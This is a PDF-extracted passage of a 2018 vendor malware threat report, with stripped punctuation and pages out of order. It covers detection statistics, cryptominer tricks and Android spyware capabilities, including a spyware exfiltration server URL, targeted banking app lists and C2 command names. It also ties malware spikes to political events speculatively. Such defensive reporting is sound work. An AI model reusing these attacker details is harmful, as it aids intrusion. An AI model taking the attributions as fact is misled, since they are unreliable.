In Q2 2018 the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target Adobe Portable Document Format (pdf) files which were created in the 1990s to present documents in a common format independent of application software hardware and operating systems
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018 with Japan clearly experiencing the most persistent challenges
Global Threat Report Q2 2018 Edition
Page 51 of 73
53 Medium Threat Malware In this section we will focus on five malware types that are somewhat rarer and more exotic These include Email Flooders Constructors Jokes Virtual Tools and Malware Packers
Global Threat Report Q2 2018 Edition
Page 52 of 73
531 Constructor Constructors are applications that can be used to automatically create malware files
For Q2 Alamar was the 1 constructor that Comodo detected Microsoft describes this program as a ldquoSevererdquo malware threat to PC users
In Q2 Germany (de) was the top country of detection for Constructors
And this timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that the malware is likely a persistent threat to German networks
Global Threat Report Q2 2018 Edition
Page 53 of 73
532 Packers Malware that is ldquopackedrdquo refers to any means used to hide or obfuscate malicious executable code by compressing or ldquopackingrdquo it within larger seemingly innocuous software and data streams The hostile code can even come in the form of scripts The compressed data often contains separate decompression code or even a self-extracting archive which is used to recreate the original code from the compressed code and then execute the malware Encryption may also be used to conceal the malware from security software as another means to obfuscate the attack
MUPX or the Modified ldquoUltimate Packer for Executablesrdquo dominated this part of the malware landscape MUPX is free open source software that is compatible with numerous file formats and different operating systems and leverages an open source data compression algorithm UCL that is just a few hundred bytes of code in length
In Q2 2018 Russia was the 1 home to malware Packers
This timeline shows that Russia had the most persistent Packer problems while Iran had the highest periodic spikes
Global Threat Report Q2 2018 Edition
Page 54 of 73
533 Email Flooder Email Flooders are malware used to overwhelm email servers with messages in order to ldquokillrdquo it or shut it down in a form of denial-of-service (DoS) attack
The one Email Flooder that Comodo detected in Q2 2018 was Palevo which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders
The primary country where Comodo detected this malicious behavior was in Germany
And this timeline shows that while the number of Palevo detections was not high it was still a persistent threat in Germany
Global Threat Report Q2 2018 Edition
Page 55 of 73
534 Virtual Tools Virtual Tools are programs that can modify or alter malicious files to avoid detection
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher AntiAV and RunFile
The top two countries for Virtual Tools detections were Germany and the US
This timeline shows that Germany had one particularly heavy infestation around the beginning of June while the US had two sharp spikes one at the start and the other at the end of Q2 2018
Global Threat Report Q2 2018 Edition
Page 56 of 73
535 Jokes ldquoJokerdquo malware is in fact just what it says these are non-malicious applications which claim to take a malicious action when in fact they are only intended as humor or simply to annoy the user for a brief period of time
Such malware is typically only labeled a ldquoMediumrdquo threat because the hackerrsquos intention is not to damage or destroy information but merely to have fun at the victimrsquos expense
Germany (de) and the US were the top two countries of detection for Joke malware
In this timeline you can see that this malware type is not numerous ndash but still something to be aware of
Global Threat Report Q2 2018 Edition
Page 57 of 73
54 Low Threat Malware Applications In this section we will cover a range of malicious functionality that Comodo detected within Applications Unwanted Applications and Unsafe Applications
Global Threat Report Q2 2018 Edition
Page 58 of 73
541 Applications Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose However Comodo detects and flags such applications as malicious because they to exhibit behavior that of which users may be unaware including extreme efforts to track user behavior and location
In Q2 2018 the most common such application was Elex Despite the fact that Microsoft has labeled Elex only as ldquoPotentially Unwanted Applicationrdquo or PUA this software is nasty and attempts to install files that run at startup add drivers inject processes alter browser behavior and modify DNS settings
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications
And finally this timeline shows that far from being a rare occurrence such malicious software is endemic especially in North America
Global Threat Report Q2 2018 Edition
Page 59 of 73
542 Unwanted Applications The unwanted application malware category is alarming in that during the course of common computer and Internet activity users often inadvertently install these Applications For example they include common adware programs widely disseminated images videos dialers jokes gossip and more
The most common unwanted application that Comodo detected this quarter was DealPly which Microsoft describes as ldquopoor reputationrdquo software that tries to install additional bundled software modify the user homepage modify search provider andor perform other actions users might not have intended They include free toolbars adware and ldquosystem optimizersrdquo
As you can see in the bubble chart the US is far and away the most common country of detection for unwanted applications in Q2 2018
And as this timeline shows this malware type poses not only a large but also a daily challenge to network security in the US
Global Threat Report Q2 2018 Edition
Page 60 of 73
543 Unsafe Applications Unsafe applications are seemingly legitimate programs but in fact are frequently leveraged by coders and hackers with malicious intent Often they claim to help users with administrative or security functionality but in fact do the opposite and include fake anti-virus and free Internet Relay Chat (IRC) clients
The most common unsafe application that Comodo detected in Q2 2108 was AutoKMS software that can be used to ldquocrackrdquo or patch unregistered copies of Microsoft software These are referred to as ldquohacktoolsrdquo and may be distributed with additional malware that users can install inadvertently
This malware type is a bit different in that while the US is currently the most common country of detection Ukraine (ua) and Russia (ru) are 2 and 3 respectively
This timeline shows that the US ndash and to a lesser extent Ukraine ndash have a steady problem with Unsafe Applications while Russia experienced one major spike in Q2 2018
Global Threat Report Q2 2018 Edition
Page 61 of 73
6 Vertical analysis In this section letrsquos examine unique malware profiles that Comodo identified within specific ldquoverticalsrdquo or economic sectors The infographic details unique malware distributions for twenty-two vertical markets or industries from automotive to travel covering four dangerous malware types Backdoors Trojans Viruses and Worms Further the diagram lists the 1 malware family for each Verticalrsquos top malware type
Letrsquos take a closer look at two trojans Kryptik and Zbot that were the top detected in not only one but within multiple verticals clearly making them a current strategic threat across the world
Global Threat Report Q2 2018 Edition
Page 62 of 73
First Kryptik the New Jersey Cybersecurity amp Communications Integration Cell reported that Kryptik was first created to obtain information about an infected hostrsquos FTP servers but now has the ability to target email clients file browsers and file managers CNET Magazine wrote that Kryptik has been used as a trojan ldquoClickerrdquo to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017
Second letrsquos examine ldquoZbotrdquo which is another name for the ldquoZeusrdquo Trojan undermining Microsoft Windows security since 2007 One of its first uses was to target the United States Department of Transportation And over a decade later Zbot is still the top Trojan in government and transportation verticals Today the Zeus botnet may be the largest on the Internet with millions of compromised machines around the world
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing It has also been used to install ransomware including CryptoLocker Zbot is often spread through drive-by downloads and email phishing attacks sometimes supported by a social engineering scheme that falsely claims that a targetrsquos computer already has a Virus and needs to be cleaned
In conclusion trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks Second strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them
Global Threat Report Q2 2018 Edition
Page 63 of 73
7 Geopolitical Intelligence
71 USA This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018 Clearly the major spike on March 13 stands out in this data What happened on this day in the US and what might help to explain the surge in malware activity On that day US President Donald Trump announced the names of his new Secretary of State Mike Pompeo and new CIA Director Gina Haspel In that light one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements comprising many requests for information related to upcoming changes in US political military and intelligence activities After which these agencies immediately began to fulfill these requirements via computer hacking ndash commonly called cyber espionage ndash which today takes place on a far greater scale than the public realizes
Global Threat Report Q2 2018 Edition
Page 64 of 73
72 China This chart illustrates Comodorsquos aggregated malware detections in China for Q2 2018 Clearly June 4 stands out as the single most prominent day The reason for this massive spike is that many intelligence services ndash both foreign and domestic ndash were likely busy trying to protect andor collect sensitive information relating to current events within China Why on June 4 That is the anniversary of the 1989 Tiananmen Square protests
Global Threat Report Q2 2018 Edition
Page 65 of 73
73 South Korea
National security events always attract the attention of professional hackers who seek to collect the kind of information as the basis for intelligence reporting This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018 The highest single spikes took place simultaneous to annual joint US-South Korean military exercises This fact should come as little surprise in the Internet age when everyone from students to soldiers spies and statesmen does most of their work online Students collect data for academic papers spies collect data for intelligence reports
Global Threat Report Q2 2018 Edition
Page 66 of 73
74 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018 At the beginning of May Comodo saw a spike consisting of well over ten times the number of usual detections One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of this short period of political openness to better connect with the outside world Comodo did further research on the detected malware and identified it as Windows activation or ldquocrackingrdquo software and Chinese-made anti-censorship programs
Global Threat Report Q2 2018 Edition
Page 67 of 73
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
Global Threat Report Q2 2018 Edition
Page 68 of 73
76 Belarus
A common hacker refrain is that ldquoinformation wants to be freerdquo Evidence for this argument is provided by this timeline which shows Comodorsquos Virus and Trojan detections in Belarus in Q2 2018 On June 14 as the government in Minsk passed new legislation with a view toward controlling the spread of ldquofake newsrdquo Comodo detected a massive spike in both viruses and trojans It is possible that the virus outbreak was specifically used to disseminate trojan horses which were then leveraged for some real-world purpose either to gather deny or manipulate sensitive information related to the new legislation and its impact on Belarus society
Global Threat Report Q2 2018 Edition
Page 69 of 73
77 Iraq
Today there is possibly no hotter topic in information security than election hacking In this chart showing Comodo malware detections in Iraq in Q2 2018 two clear spikes stand out that we must consider Both might be associated with recent electoral incidents In mid-April Iraq was preparing for a national election which included a conundrum on how best to secure its electronic dimension And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls
Global Threat Report Q2 2018 Edition
Page 70 of 73
78 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detection ndash and sometimes there may be multiple reasons In this timeline of Comodo malware detections in Ukraine in Q2 2018 there may have been multiple reasons for the highest spike on May 24 Both of the cited news stories are from May 23 the first discusses Ukrainersquos Independence Day as well as Ukrainersquos testing of new military weapons provided by the US government the second describes a cyberattack that Ukraine feared would target a major sporting event the Champions League final in Ukrainersquos capital city Kyiv on May 26
Global Threat Report Q2 2018 Edition
Page 71 of 73
79 Croatia
Since the cyberattack that targeted Estonia in 2007 it is clear that cyberattacks can be used to punish not only individuals and enterprises but also entire nations In that context this massive spike in malware detection in Croatia on March 28 is interesting as it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an ldquoact of hostilityrdquo
Global Threat Report Q2 2018 Edition
Page 72 of 73
710 Finland Russia USA
Finally letrsquos have a look at Comodorsquos virus detections in Finland during Q2 2018 The largest single spike ndash by far ndash occurred on the day when the press began to report that Donald Trump and Vladimir Putin would have a summit in the Finnish capital of Helsinki Geolocation of this Virus activity in Finland revealed that it almost exclusively took place in Helsinkirsquos suburb of Vantaa ndash precisely where the summit was scheduled to take place
Global Threat Report Q2 2018 Edition
Page 73 of 73
8 Conclusions In Q2 Comodo Cybersecurity observed several new significant trends likely to radically influence the cybersecurity marketplace and IT end users These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios
The fact that trojan malware increased in the last quarter means that the spread of malware in general will be amplified soon Trojans are a covert weapon and the cybersecurity industry should suppose that many trojan-based attacks that occurred in Q2 remain undetected with the real impact of these attacks being revealed in quarters to come Another meaningful fact is that trojans serve as a delivery vector for other types of malware Combined these facts point to a huge surge in infection of hosts worldwide with a diversity of malware samples
Our findings show that malware is becoming more cunning in delivery method sophisticated in persistence and much harder to detect by antivirus software Propagation of fileless malware the evolution of cryptominers and using legitimate tools like PowerShell to attack are clear evidence of this uptick in sophistication
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information but lack protection comparable to that on desktop systems presaging new attacks and mobile malware development As more people use their mobile devices for financial transactions (via banking and e-payment apps) and store confidential information (like messenger correspondence and private pictures) cybercriminals can anticipate rich pickings from exploiting those devices With successful penetration perpetrators profit by stealing money selling confidential information or blackmailing victims
Moreover given that the majority of detected trojans in Q2 were information stealers we can see another dangerous tendency the accelerating of cybercriminalsrsquo bias to hunt for confidential data
Combined these trends promise a heavy impact on the cybersecurity marketplace and on IT end-users in the future creating changes in the cybersecurity landscape and forcing IT-security departments to update their security measures and probably revamp their security strategy policies and postures
NORTH AMERICA―
EUROPE―
ASIA―
REQUEST A DEMO Try Comodo Cybersecurity by speaking with
a security consultant to begin the process to set up a demo or proof-of-concept project
Contact us directly at +1 888-266-6361
copy 2018 ALL RIGHTS RESERVED COMODO SECURITY SOLUTIONS INC
VISIT COMODOCOM
Comodo Security Solutions Inc1255 Broad StreetClifton NJ 07013United StatesTel +1 (888) 551 1531Tel +1 (888) 266 6361Int +1 (703) 581 6361Fax +1 (973) 777 4394salescomodocom
Comodo Security Solutions IncȘoseaua Națională 31 Iași 700237Romania Europe+40 332 806 772
Comodo Security Solutions Pvt LtdPrestige Office Centre183 NSK Salai VadapalaniChennai IndiaTe +91 44 4562 2800wwwcomodocoin
Comodo Threat Research Labs monitors filters and analyzes malware ransomware viruses and other ldquounknownrdquo potentially dangerous files 247365 in over 190
countries around the world With 5 offices spread across the Americas Asia and Europe (and staff covering over 190 countries) the Lab is made up of more
than 220 IT security professionals ethical hackers computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing
millions of potential pieces of malware phishing spam or other maliciousunwanted files and emails every day
The Lab also works with trusted partners in academia government and industry to gain additional insights into known and potential
threats CTRLrsquos mission is to use the best combination of cybersecurity technology and innovations machine
learning-powered analytics artificial intelligence and human experts and insights to secure and protect
Comodo Cybersecurity customers business and public-sector partners and the public community
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape Building on its unique position as the worldrsquos largest certificate authority Comodo Cybersecurity authenticates validates and secures networks and infrastructures from individuals to mid-sized companies to the worldrsquos largest enterprises Comodo Cybersecurity provides complete end-to-end security solutions across the boundary internal network and endpoint with innovative technologies solving the most advanced malware threats both known and unknown With global headquarters in Clifton New Jersey and branch offices in Silicon Valley Comodo Cybersecurity has international offices in China India the Philippines Romania Turkey Ukraine and the United Kingdom For more information visit comodocom Comodo Cybersecurity and The Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries Other names may be trademarks of their respective owners The current list of Comodo Cybersecurity trademarks and patents is available at comodocomrepository
About Comodo Cybersecurity
Brought to you by
- 1 Executive summary
-
- 11 Overview
- 12 New Trends
-
- 121 Trojans jumped to the top of the malware list
- 122 Cryptominers evolved into multifunctional malware
- 123 Android malware skyrocketed in variety
- 124 Geopolitical intelligence
-
- 2 Trojans going on the offensive to hunt for confidential data
-
- 21 The Most Widespread Trojan
- 22 PowerShell-based attack with Emotet
- 23 Flawed Ammyy RAT attack based on legitimate software
- 24 The growth of Flawed Ammyy attacks for Q2
- 25 Ammyy Admin dissemination around the world for Q2
-
- 3 Cryptominer Evolution
-
- Going Fileless Killing Competitors Crashing Systems
- 31 BadShell attacks enterprises
- 32 WinstarNssmMiner a system killer
- 33 CoinMiner kills rivals
- 34 CoinHive changes its skin
- 35 Cryptocurrency clipboard hijacker intercepts transfers
-
- 4 Android Devices Under Siege
-
- 41 Spying Stealing Mining
-
- 411 KevDroid
- 412 Zoo Park
- 413 MikeSpy
- 414 Xloader
- 415 Stalker Spy
- 416 Mystery Bot
- 417 FakeSpy
- 418 RedAlert
- 419 Hero Rat
- 4110 Sonvpay
- 4111 CoinHive
-
- 42 Android Malware Catalogued by Month
-
- 421 April 2018
- 422 May 2018
- 423 June 2018
-
- 5 Malware in Q2 2018 The Big Picture
-
- 51 Strategic Threat Computer Worms
-
- 511 Generic Worms
- 512 Net Worms
- 513 Email Worms
- 514 p2p Worms
- 515 IM Worms
-
- 52 High Threat Malware
-
- 521 Backdoors
- 522 Viruses
- 523 Trojans
- 524 Exploits
-
- 53 Medium Threat Malware
-
- 531 Constructor
- 532 Packers
- 533 Email Flooder
- 534 Virtual Tools
- 535 Jokes
-
- 54 Low Threat Malware Applications
-
- 541 Applications
- 542 Unwanted Applications
- 543 Unsafe Applications
-
- 6 Vertical analysis
- 7 Geopolitical Intelligence
-
- 71 USA
- 72 China
- 73 South Korea
- 74 North Korea
- 75 Armenia
- 76 Belarus
- 77 Iraq
- 78 Ukraine
- 79 Croatia
- 710 Finland Russia USA
-
- 8 Conclusions
-
Global Threat Report Q2 2018 Edition
Page 20 of 73
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victimsrsquo system but their cryptomining competitors
33 CoinMiner kills rivals CoinMiner stands out against other cryptominers with a kill list feature that checks the infected machine for the presence of other cryptomalware If an ldquoalienrdquo cryptominer is detected the feature will terminate its processes
CoinMiner kills its rivals as follows
The code below downloads CoinMiner for Windows architecture (x86 or x64) and then checks if a miner is already running by testing the presence of an ldquoAMDDriver64rdquo process
Global Threat Report Q2 2018 Edition
Page 21 of 73
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists named $malwares and $malwares2 with the names of the processes that it is instructed to kill The lists include other types of cryptominers
In this way CoinMiner undividedly occupies the victims computer to use its resources for mining cryptocurrency
Global Threat Report Q2 2018 Edition
Page 22 of 73
Some cryptominers earned the spotlight of the mass-media and cybersecurity researchers easing user detection In Q2 these cryptominers learned to hide CoinHive is the brightest example of them
34 CoinHive changes its skin CoinHive is a popular JavaScript cryptominer If you put its string of code into your website page every visitor to the site will mine coins for you
As you can see the CoinHive script is easily detected
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports users have started checking websites codes for cryptominers But in the second quarter perpetrators found a way to overcome this obstacle Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners
Global Threat Report Q2 2018 Edition
Page 23 of 73
As a result the malicious code on a webpage looks like this
The obfuscated malicious code on a webpage
If we decode the string we encounter an iframe
The iframe loads the URL shortener
The iframe loads the URL shortener Notice the width and height of the iframe are set to 1 to make the iframe as invisible as possible
Now letrsquos see at the URL httpscnhvco
And there we can find the familiar link to CoinHive
The link to CoinHive
Global Threat Report Q2 2018 Edition
Page 24 of 73
What is the impact of this trick In a simple scenario a user visits a CoinHive-infected website Noticing notices that her computerrsquos CPU is overloaded she decides to check the webpage code but doesnrsquot find any signs of a cryptominer So she concludes that something went wrong with her PC while CoinHive coopts her computer to mine cryptocoins
The next malware in the raw prefers not mining cryptocurrency but steal it on-the-fly
35 Cryptocurrency clipboard hijacker intercepts transfers It would be more accurate to call this program cryptothief rather than cryptominer Because it does not devour an infected machinersquos resources but instead actually steals cryptocurrency redirecting it to the perpetrator
Cryptocurrency transfers require a wallet address The address is a long string combined with different characters and numbers so it is almost impossible to remember it or fill in manually That is why users usually copy-paste a wallet address to make a transaction Cybercriminals regard this copy-paste process a breach they can use to their advantage
Cryptocurrency clipboard hijacker checks the clipboard for a wallet address copy Upon finding one it changes it for the address of the wallet under the attackers control So an unaware owner of the infected machine delivers cryptocoins straight into cybercriminalsrsquo hands
New Cryptocurrency Clipboard Hijacker sample can monitor 2343286 addresses
This malware is distributed in a bundle with the All-Radio 427 Portable software All-Radio 427 is a legitimate video and audio player created by Russian developers But cybercriminals copied the program and added the malicious code The malicious version of All-Radio 427 was used for spreading different types of malware clipboard cryptocurrency hijackers among them
Here is an example of a clipboard hijacker attack
A user copied wallet address 3FC7NCLR3EHDRvqw7AUP3BeoC4LAtWPXFs but the malware changed it to 1HMF9YCP1VcVMKryZzrV6adEq9Dp61Zrmm
Global Threat Report Q2 2018 Edition
Page 25 of 73
An example of a clipboard hijacker attack
Spreading of Clipboard Hijacker malware around the world
Although cryptominers have decreased in quantity they seem to come back in an updated disguise and promise to become a new serious challenge for cybersecurity departments and vendors
Global Threat Report Q2 2018 Edition
Page 26 of 73
4 Android Devices Under Siege
41 Spying Stealing Mining Android devices are rapidly becoming high-value targets for cybercriminals and malware authors It is not surprising because today almost any smartphone is a treasure trove of information for perpetrators People increasingly use smartphones for financial operations but those are not the only jackpot for attackers Today every smartphone contains a plethora of confidential information about its owner
If the victim is a CEO politician or other VIP the content of the mobile device can be sold at the highest prices Perpetrators can sell stolen information to interested parties or extort money by blackmailing their victims Of course not only cybercriminals hunt for smartphone content Intelligence agencies and business competitors want to know everything about their targets Add jealous spouses tracking every move of their partners and parents wanting to control their children and you will easily understand why Android-oriented malware is a growing business
Today spying is the number one purpose of the Android malware In Q2 Comodo analysts detected a variety of spying tools that penetrate mobile devices and extract data from them You can see the whole family of these digital spooks on the graph
The digital spooks
Global Threat Report Q2 2018 Edition
Page 27 of 73
Like real-world spies digital agents impersonate legitimate entities pretending to innocent applications or hiding malicious code inside legitimate software Like real spies they seek to remain invisible and constantly change disguises to avoid detection and hone their tradecraft from version to version
411 KevDroid The first is named KevDroid Itrsquos distributed in three versions
Version-1 Naver Defender
Version-2 Netease Defender
Version-3
PU
Disguises of KevDroid
The first version disguised as the Naver Defender application covertly penetrates a mobile device and hides its icon from the launcher screen to avoid detection This sample has multifunctional abilities for spying It steals account details contacts id name phone numbers and email address of the owner It grabs SMS messages and associated info It attempts to read call logs (number name type duration) emails (email type) and photos of the contacts After extracting all the data the malware encrypts it with ldquoAESrdquo algorithm and send to the attackersrsquo server httphttpcgalimcomadminhrpupuphpdo=upload
KevDroid records the victimrsquos every phone call then encrypts and uploads it to the cybercriminalsrsquo server In addition it collects information about currently running services installed apps and the launcher name
The second version Netease Defender has additional spying abilities It takes control over the device camera and covertly records the victimrsquos activity Then it sends the video to the attackersrsquo server
Version-3 of KevDroid makes photos records call and creates a list of files on the device Also it extracts the web history account and contact details and the device information
People assume they are safe if they download apps exclusively from the official Google Play store This wrong assumption can be costly the first version of Desert Scorpion spyware was spread via official Google Play Services The spyware was camouflaged as a chat called Dardesh Instant App But when a user downloaded and ran it the app covertly connected to
Global Threat Report Q2 2018 Edition
Page 28 of 73
cybercriminalsrsquo Command and Control server and downloaded the spyware on the device From that moment the spyware constantly kept track of all events on the infected device Another means of the malware dissemination was social networks
Version-1 Dardesh Google Play Services Instant Apps
Version-2 Settings
Disguises of Desert Scorpion
The second version of Desert Scorpion records calls audios and videos uninstalls other apps sends and receives messages and tracks the location of the smartphone It is included in some spyware tools like FinSpy and Pegasus Beyond the capabilities of the first version it collects information about installed applications extracts the metadata and makes changes on the victim device
Global Threat Report Q2 2018 Edition
Page 29 of 73
412 Zoo Park The next member of the spy family Zoo Park has 4 different versions
Version-1 Telegram Groups انتخاب دھم
Version-2 Postrall Yes For Referendum انتخاب دھم
Version-3 Celebs Gone Wild جریدة النھار الكویتیة 剑侠挂机
Version-4 VPN Easy DroFirewall m_android
Disguises of Zoo Park
The first version tries to impersonate the Telegram app It extracts Accounts and Contacts details encodes them with Base64 and sends to the attackers server The second version has additional abilities extracting SMS details device information (including IMEI Network Operator Name SDK version OS version etc) Call Log details and External Storage content
The third version is included in spyware named ldquoSpymaster Prordquo and can
Enable and disable the GPS services
Record audio and send it to Command amp Control server
Upload image files
Collect information about the application installed
Collect browserrsquos data
Send SMS and read outgoing SMS
The fourth version is spread in malicious clones of popular legitimate applications like VPN Easy DroFirewall etc
Global Threat Report Q2 2018 Edition
Page 30 of 73
In addition to the abilities of previous versions it includes some additional tricks
Extracts photos audios and videos
Records screen
Executes shell commands
Records calls
413 MikeSpy Some spyware examples specifically hunt for messengerrsquos data Like the next digital spook MikeSpy
Virtual Girlfriend
Disguises of MikeSpy
MikeSpy camouflaged itself as a Virtual Girlfriend application But instead of girlfriend it has a bundle of malicious abilities
Takes control over Bluetooth Adapter
Extracts data about accounts contacts details installed apps
Extracts data from the WhatsApp Message DB and related keys
Uploads collected data to the cybercriminalsrsquo server via FTP
414 Xloader The next spyware Xloader combines spying with purposeful hunting for banking applications on the device It has trust-inspired cover icons imitating Facebook and Google Chrome
Version-1 to Version-3 FaceBook Chrome
Disguises of Xloader
Global Threat Report Q2 2018 Edition
Page 31 of 73
After infection Xloader connects to its CampC server and executes the following commands
Extract the device information
Delete SMS
Set ringer mode
Monitor incoming SMS messages
Clear memory
Check for the next banking applications presence comwooribankpibsmart comkbstarkbbank comibkneobanking comscdanbscbankapp comshinhansbanking comhanabankebkchannelandroidhananbank nhsmart comepostpsfsdsi comkftckjbsmb comsmgspbsrdquo
Extract contacts details
Set Wi-Fi always turned on
Version 2 can execute additional commands
Send SMS and read outgoing SMS
Enable and disable a Wi-Fi connection
Access to a location specified by attackers
Make records
Make calls
415 Stalker Spy The next malware in the raw is Stalker Spy As you can see its a champion in the number of masks it puts on to deceive users
App Distribution
FlexiSpy MBackup
HelloSpy ProActivator TActivator Setting Wi-Fi Settings ردیاب اسپای ھاید Keylogger System Service
Global Threat Report Q2 2018 Edition
Page 32 of 73
Mobile Spy
随意代挂 Subway Surfers 라이브성인방송 Мобильный антивирус droidgetlogevent SmartcardService Cheats Z
CloudAgent New Insta Follow Android CJ 대한통운 택배 余生代挂APP Basic Daydreams SystemWifiService Samplecom мобильный клиент Asa刷钻
Disguises of Stalker Spy
In addition to usual must-have spyware set Xloader can turn on microphone remotely on the infected device to make recordings This malware is used in three known applications FlexiSpy HelloSpy MobiSpy
416 Mystery Bot The next malware is much more than a spy The first version of Mystery Bot is a combination of spyware that steals information with a banking trojan that connects to CampC server of Locky bot The second version Mystery Bot is ransomware that encrypts files on external storage After encryption the malware deletes original files So we can call it a spy with an OO7 licenserdquo
Version 1 Adobe Flash Player
Version2 Flash Player
Disguises of Mystery Bot
Mystery Bot comes under cover of Adobe Flash Player Below is the list of some commands that the malware can execute on your device
Global Threat Report Q2 2018 Edition
Page 33 of 73
Send_SMS mdash extract SMS content and set it to CampC server
Send_USSD mdash send the USSD to CampC server
Gethistory mdash monitor browser history
Start_AllApp mdash gather info about installed applications
Send_call mdash set the Intent action to call
Forward_call mdash forward incoming calls
ResForward_call mdash reset the forward calls
Go_Smsmnd mdash delete SMS content
Go_GetAlls mdashget SMS History
Dell_sms mdash delete SMS content in a conversation
Send_spam mdash send spam SMS
Start_Inject mdash call injectors class
417 FakeSpy FakeSpy also has many masks that you can see in the screenshot
佐川急便 현대캐피탈
Disguises of FakeSpy
It collects available information from the infected device and sends to CampC servers Also it checks for the next banking applications aucomapp softbankcomapp docomocomapp
Here are some commands from its Command and Control server
contacts - Get contact details and email id
Mute - Set action to mute
Mms - Get MMS content
info - Get device information
Global Threat Report Q2 2018 Edition
Page 34 of 73
418 RedAlert RedAlert changes multiple ldquospy legendsrdquo to get users trust It wears masks of popular application to deceive its victims Update Flash Player Viber WhatsApp Update WhatsApp Ebook Reader
Version 1 EbookReader Update Flash Player Android Update WhatsApp Viber
Version_2 Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums Its distinguishing feature is the ability to block incoming calls from banks It canvasses the device in search of the following bank applications
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites including Google Chrome Google Play store Gmail and YouTube
419 Hero Rat The next digital spook Hero Rat mostly acts on the Iran territory It uses third-party play stores social networks and messengers for spreading
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
Global Threat Report Q2 2018 Edition
Page 35 of 73
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on the Telegram hacking channel Noticeably that itrsquos sold in three options bronze silver and gold
After infiltration into a victimrsquos device Hero Rat shows a warning like app canrsquot be runrdquo But it runs in the background and starts the spying activity It steals text messages audio records makes calls detect device location etc The newly infected device is controlled via Telegram bot functionality
Hero Rat disguises as Bitcoin Free Internet Connection Get free Followers and Telegram versions for Iranian market
4110 Sonvpay The next malware Sonvpay also wears many masks but it is more of a fraudster than a spy
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Global Threat Report Q2 2018 Edition
Page 36 of 73
Sonvpay covertly subscribes the infected devices to WAP and SMS services to add extra charges to the ownerrsquos mobile billing Once installed this malware displays fake notification ldquoskip optionrdquo If you click this button this malware begins to work in the background subscribing the user to services she did not order
It comes to victims in a variety of disguises named below
4111 CoinHive And the last one in our Q2 Android malware list is CoinHive We already mentioned it earlier in the report and here is the version for Android devices CoinHive for Android comes in three versions every of them updates its mining potential It is disseminated via counterfeit apps you see below But one of the vectors is especially interesting
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via hellip another cryptominer named CoinMiner
How is it possible Letrsquos imagine a cybercriminal who wants to infect its victims with a cryptominer to utilize their recourses for cryptocurrency mining She chooses CoinMiner for that purpose downloads it and implants into the victimsrsquo machines However she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive So the first attacker is a victim Thief robbing thief
This story clearly illustrates the situation in cybersecurity in Q2 No one can feel totally secure Even a predator can turn prey in seconds
Global Threat Report Q2 2018 Edition
Page 37 of 73
42 Android Malware Catalogued by Month Below you will find detailed statistics on Android-targeted malware by months
421 April 2018
Android-targeted malware on April
422 May 2018
Android targeted malware on May
020000400006000080000
100000120000140000160000180000
050000
100000150000200000250000300000350000400000450000500000
Global Threat Report Q2 2018 Edition
Page 38 of 73
423 June 2018
Android-targeted malware on June
0
50000
100000
150000
200000
250000
300000
Global Threat Report Q2 2018 Edition
Page 39 of 73
5 Malware in Q2 2018 The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018 The graphic covers over 400 million unique malware detections in 237 countriesrsquo top-level domains (ccTLD) This report tries to disentangle this web of malicious activity and understand each malware type individually as well as its impact around the world
Global Threat Report Q2 2018 Edition
Page 40 of 73
